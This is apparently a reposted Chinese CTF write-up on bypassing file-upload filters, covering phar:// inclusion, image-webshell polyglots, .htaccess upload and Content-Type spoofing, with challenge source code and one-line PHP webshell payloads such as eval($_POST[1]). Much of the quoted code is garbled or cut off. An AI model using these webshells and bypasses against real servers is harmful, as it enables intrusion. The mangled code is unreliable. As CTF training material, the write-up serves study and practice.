CTF文件上传相关小结

最近刷了几道文件上传的题,其中包括 js 绕过、.htaccess 上传、phar 绕过,文件上传的题目一般都是黑盒,白盒审计很少,奇奇怪怪的东西还是挺多的。就我自己来说,做这种题一般都是各种都试试,基本上都能出来。

姿势一:Pr绕过上传限制

CTF文件上传相关小结进行压缩,之后把 rar 的后缀名改成 jpeg 格式

首先我们在本地测试一下: 准备一句话木马

test.php

index.phpCTF文件上传相关小结可以看到,是可以执行的。

安恒月赛:image_up

首先我们把源码读出来:

这里是利用伪协议读取源码/index.php?page=php://filter/read=convert.base64-encode/resource=index.php

index.php

<?php if(isset($_GET['page'])){ if(!stristr($_GET['page'],"..")){$page = $_GET['page'].".php";include($page);}else{header("Location: index.php?page=login"); }}else{header("Location: index.php?page=login");}

login.php

<?php if(isset($_POST['username'])&&isset($_POST['password'])){header("Location: index.php?page=upload");exit(); }?>

upload.php

<?php $error = "";$exts = array("jpg","png","gif","jpeg"); if(!empty($_FILES["image"])){$temp = explode(".", $_FILES["image"]["name"]);$extension = end($temp); if((@$_upfileS["image"]["size"] if(in_array($extension,$exts)){$path = "uploads/".md5($temp[0].time()).".".$extensmove_uploaded_file($_FILES["image"]["tmp_name"], $p $error = "上传成功!";} else{$error = "上传失败!"; }}else{$error = "文件过大,上传失败!";} }?>

这道题就是利用 phar 伪协议去包含我们写好的一句话

具体做法: 木马文件打包成压缩包,然后改后缀,再利用 phar 伪协议读取

phar://./uploads/4h214215521321.jpg/1

最后用蚁剑链接就可以拿到 flag

姿势二:js绕过

例题一CTF文件上传相关小结查看源码之后发现文件上传,图片马

先来做一个吧

合成图片马的命令:copy 1.png /b + 1.txt /a 2.pngCTF文件上传相关小结我们先来上传一个一句话木马吧,CTF文件上传相关小结这里发现是能够上传成功的,但是不解析,最后利用 JS 绕过 payload:

system(“ls”)

利用 file 读取上传的文件,发现是解析 php 文件的
CTF文件上传相关小结查看文件名发现有 flag 相关文件,直接读就出
CTF文件上传相关小结例题二:安恒 A 计划

先附上源码吧

index.php

?phperror_reporting(0); highlight_file(__FILE__);$file = $_GET['file'];if (preg_match("/flag/", $file)){die('Oh no!'); }include $file;?>

file_up1oad.php

<?php error_reporting(0); date_default_timezone_set('PRC'); if(isset($_FILES['file'])) {$file_name = basename($_FILES["file"]["name"]);$file_ext = pathinfo($file_name,PATHINFO_EXTENSION); $file_type = $_FILES['file']['type'];$file_content = $_FILES['file']['tmp_name']; if(in_array($file_ext, ['php', 'php3', 'php4', 'php5', 'phtml', 'pht'])) {die('Php file ?');}if (!in_array($file_type, ['image/jpeg', 'image/gif', 'image/ png'])){die('Bad file'); }if (preg_match("/die('Bad file of content !'); }if (!file_exists('uploads')){ mkdir('uploads');}$new_filename = md5(time()).'.'.$file_ext;$u = move_uploaded_file($_FILES['file']['tmp_name'], './uploads/' . $new_filename); if ($u){echo 'Successful'."n";echo '/uploads/'.$new_filename; }}?>

File upload


审计了一下,估计也就是 js 合成个图片马CTF文件上传相关小结php 文件:

 system( 'ls'); 

CTF文件上传相关小结合成木马直接上传,

/index.php/?file=/var/www/html/uploads/62bfd63a7b411adea7a484c88cbaed0d.png

利用一下文件包含
CTF文件上传相关小结直接查看 flag 文件
CTF文件上传相关小结例题三:[GXYCTF2019]BabyUpload
CTF文件上传相关小结

eval ($_POST[1]);

合成图片马:

直接上传蚁剑连接CTF文件上传相关小结源码:

<?php session_start();echo "Upload上传文件 ";error_reporting(0); if(!isset($_SESSION['user'])){$_SESSION['user'] = md5((string)time() . (string)rand(100, 10 00));}if(isset($_FILES['uploaded'])) {$target_path = getcwd() . "/upload/" . md5($_SESSION['user']) ;$t_path = $target_path . "/" . basename($_FILES['uploaded'][' name']);$uploaded_name = $_FILES['uploaded']['name'];$uploaded_ext = substr($uploaded_name, strrpos($uploaded_nam e,'.') + 1);$uploaded_size = $_FILES['uploaded']['size']; $uploaded_tmp = $_FILES['uploaded']['tmp_name'];if(preg_match("/ph/i", strtolower($uploaded_ext))){ die("后缀名不能有 ph!");} else{if ((($_FILES["uploaded"]["type"] == "") || ($_FILES["uploaded"]["type"] == "image/jpeg") || ($_FILES["uploaded"]["type"] == "image/pjpeg")) && ($_FILES["up loaded"]["size"] $content = file_get_contents($uploaded_tmp); if(preg_match("/die("诶,别蒙我啊,这标志明显还是 php 啊"); }else{mkdir(iconv("UTF-8", "GBK", $target_path), 0777,true);move_uploaded_file($uploaded_tmp, $t_path); echo "{$t_path} succesfully uploaded!";}} else{die("上传类型也太露骨了吧!"); }}?>

姿势三:.htaccess上传

CTF文件上传相关小结我们把 content-type 改成 image/jpeg 格式CTF文件上传相关小结发现上传成功,下一步就是传图片马CTF文件上传相关小结源码: index.php

<?php session_start();echo "是兄弟就来传CTF文件上传相关小结"8CTF文件上传相关小结"8KcVoT.jpg"
";if(!isset($_SESSION['user'])){$_SESSION['user'] = md5((string)time() . (string)rand(100, 10 00));}?>

upload.php

<?php session_start();echo ""; if(!isset($_SESSION['user'])){$_SESSION['user'] = md5((string)time() . (string)rand(100, 10 00));}if(isset($_FILES['uploaded'])) {$target_path = getcwd() . "/upload/" . md5($_SESSION['user']) ;$t_path = $target_path . "/" . basename($_FILES['uploaded'][' name']);$uploaded_name = $_FILES['uploaded']['name'];$uploaded_ext = substr($uploaded_name, strrpos($uploaded_nam e,'.') + 1);$uploaded_size = $_FILES['uploaded']['size']; $uploaded_tmp = $_FILES['uploaded']['tmp_name'];if(preg_match("/ph/i", strtolower($uploaded_ext))){ die("我扌 your problem?");}else{if ((($_FILES["uploaded"]["type"] == "") || ($_FILES["uploaded"]["type"] == "image/jpeg") | | ($_FILES["uploaded"]["type"] == "image/pjpeg")|| ($_FILES["uplo aded"]["type"] == "image/png")) && ($_FILES["uploaded"]["size"] 2048)){mkdir(iconv("UTF-8", "GBK", $target_path), 0777, true)move_uploaded_file($uploaded_tmp, $t_path);echo "{$t_path} succesfully uploaded!"; }else{die("我扌 your problem?");}}}

CTF文件上传相关小结

相关推荐: 弱密码和邮件外发准则

近日,这类以系统登录存在风险为由的垃圾邮件又开始泛滥。 通过邮件标头的来源显示,其涉及企业公共邮箱和一些单位邮箱。这些邮件均来自真实的发件方。 要知道弱密码的用户,所造成的威胁远不止利用其外发垃圾邮件,攻击者可以通过帐户密码远程访问OA等一系列的应用系统,了解…

本文为转载文章,源自互联网,由网络整理整理编辑,转载请注明出处:https://www.hacksafe.net/articles/network/6083.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注